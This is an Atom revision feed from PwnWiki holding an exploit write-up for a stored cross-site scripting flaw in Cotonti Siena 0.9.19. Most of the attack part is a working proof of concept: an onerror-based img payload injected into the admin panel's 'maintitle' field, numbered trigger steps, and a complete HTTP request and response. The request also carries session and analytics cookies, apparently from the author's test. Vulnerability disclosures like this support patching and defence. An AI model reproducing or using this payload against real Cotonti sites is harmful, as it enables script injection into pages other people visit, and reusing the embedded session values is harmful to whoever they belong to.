<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Cotonti_Siena_0.9.19_XSS%E6%BC%8F%E6%B4%9E</id>
	<title>Cotonti Siena 0.9.19 XSS漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Cotonti_Siena_0.9.19_XSS%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Cotonti_Siena_0.9.19_XSS%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-15T04:31:32Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Cotonti_Siena_0.9.19_XSS%E6%BC%8F%E6%B4%9E&amp;diff=5175&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;pre&gt; # Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting # Date: 2021-15-06 # Exploit Author: Fatih İLGİN # Vendor Homepage: cotonti.com # Vulne...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Cotonti_Siena_0.9.19_XSS%E6%BC%8F%E6%B4%9E&amp;diff=5175&amp;oldid=prev"/>
		<updated>2021-06-16T09:28:18Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; # Exploit Title: Cotonti Siena 0.9.19 - &amp;#039;maintitle&amp;#039; Stored Cross-Site Scripting # Date: 2021-15-06 # Exploit Author: Fatih İLGİN # Vendor Homepage: cotonti.com # Vulne...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting&lt;br /&gt;
# Date: 2021-15-06&lt;br /&gt;
# Exploit Author: Fatih İLGİN&lt;br /&gt;
# Vendor Homepage: cotonti.com&lt;br /&gt;
# Vulnerable Software: https://www.cotonti.com/download/siena_0919&lt;br /&gt;
# Affected Version: 0.9.19&lt;br /&gt;
# Tested on: Windows 10&lt;br /&gt;
&lt;br /&gt;
# Vulnerable Parameter Type: POST&lt;br /&gt;
# Vulnerable Parameter: maintitle&lt;br /&gt;
# Attack Pattern: &amp;quot;&amp;gt;&amp;lt;img src=1 href=1 onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&amp;lt;/img&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Description&lt;br /&gt;
&lt;br /&gt;
1) Entering the Admin Panel (vulnerableapplication.com/cotonti/admin.php)&lt;br /&gt;
2) Then go to Configuration tab and set payload (&amp;quot;&amp;gt;&amp;lt;img src=1 href=1 onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&amp;lt;/img&amp;gt;) for Site title param&lt;br /&gt;
3) Then click Update button&lt;br /&gt;
4) In the end, Go to home page then shown triggered vulnerability&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Proof of Concepts&lt;br /&gt;
&lt;br /&gt;
Request;&lt;br /&gt;
&lt;br /&gt;
POST /cotonti/admin.php?m=config&amp;amp;n=edit&amp;amp;o=core&amp;amp;p=title&amp;amp;a=update HTTP/1.1&lt;br /&gt;
Host: vulnerableapplication.com&lt;br /&gt;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101&lt;br /&gt;
Firefox/78.0&lt;br /&gt;
Accept: */*&lt;br /&gt;
Accept-Language: en-US,en;q=0.5&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded; charset=UTF-8&lt;br /&gt;
X-Requested-With: XMLHttpRequest&lt;br /&gt;
Content-Length: 440&lt;br /&gt;
Origin: https://vulnerableapplication.com&lt;br /&gt;
Connection: close&lt;br /&gt;
Referer:&lt;br /&gt;
https://vulnerableapplication/cotonti/admin.php?m=config&amp;amp;n=edit&amp;amp;o=core&amp;amp;p=title&lt;br /&gt;
Cookie:&lt;br /&gt;
__cmpconsentx19318=CPH17mBPH17mBAfUmBENBeCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA;&lt;br /&gt;
__cmpcccx19318=aBPH17mCgAADAAXAA0AB4AQ4DiQKnAAA;&lt;br /&gt;
_ga=GA1.2.1498194981.1623770561; _gid=GA1.2.1196246770.1623770561;&lt;br /&gt;
__gads=ID=63f33aa9dd32c83c-220723d35ec800e9:T=1623770613:RT=1623770613:S=ALNI_MZ0ifDGVpIXuopc8JXvo208SRTYmA;&lt;br /&gt;
PHPSESSID=ahmanvhckp2o5g5rnpr4cnj9c3&lt;br /&gt;
&lt;br /&gt;
&amp;amp;x=701dad27076b1d78&amp;amp;maintitle=%22%3E%3Cimg+src%3D1+href%3D1+onerror%3D%22javascript%3Aalert(1)%22%3E%3C%2Fimg%3E&amp;amp;subtitle=Subtitle&amp;amp;metakeywords=&amp;amp;title_users_details=%7BUSER%7D%3A+%7BNAME%7D&amp;amp;title_header=%7BSUBTITLE%7D+-+%7BMAINTITLE%7D&amp;amp;title_header_index=%7BMAINTITLE%7D+-+%7BDESCRIPTION%7D&amp;amp;subject_mail=%7BSITE_TITLE%7D+-+%7BMAIL_SUBJECT%7D&amp;amp;body_mail=%7BMAIL_BODY%7D%0D%0A%0D%0A%7BSITE_TITLE%7D+-+%7BSITE_URL%7D%0D%0A%7BSITE_DESCRIPTION%7D&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Response;&lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 200 OK&lt;br /&gt;
Date: Tue, 15 Jun 2021 16:07:59 GMT&lt;br /&gt;
Server: Apache&lt;br /&gt;
Expires: Mon, Apr 01 1974 00:00:00 GMT&lt;br /&gt;
Cache-Control: no-store,no-cache,must-revalidate, post-check=0,pre-check=0&lt;br /&gt;
Pragma: no-cache&lt;br /&gt;
Last-Modified: Tue, 15 Jun 2021 04:07:59 GMT&lt;br /&gt;
Vary: Accept-Encoding&lt;br /&gt;
X-Robots-Tag: noindex,nofollow&lt;br /&gt;
Content-Length: 4366&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Type: text/html; charset=UTF-8&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1 class=&amp;quot;body&amp;quot;&amp;gt;&amp;lt;a href=&amp;quot;admin.php&amp;quot; title=&amp;quot;Administration&lt;br /&gt;
panel&amp;quot;&amp;gt;Administration panel&amp;lt;/a&amp;gt;  /  &amp;lt;a href=&amp;quot;admin.php?m=config&amp;quot;&lt;br /&gt;
title=&amp;quot;Configuration&amp;quot;&amp;gt;Configuration&amp;lt;/a&amp;gt;  /  &amp;lt;a&lt;br /&gt;
href=&amp;quot;admin.php?m=config&amp;amp;n=edit&amp;amp;o=core&amp;amp;p=title&amp;quot; title=&amp;quot;Titles&lt;br /&gt;
and Metas&amp;quot;&amp;gt;Titles and Metas&amp;lt;/a&amp;gt;&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div id=&amp;quot;main&amp;quot; class=&amp;quot;body clear&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Configuration&amp;lt;/h2&amp;gt;&lt;br /&gt;
&amp;lt;div class=&amp;quot;done&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;h4&amp;gt;Done&amp;lt;/h4&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Updated&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
         &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>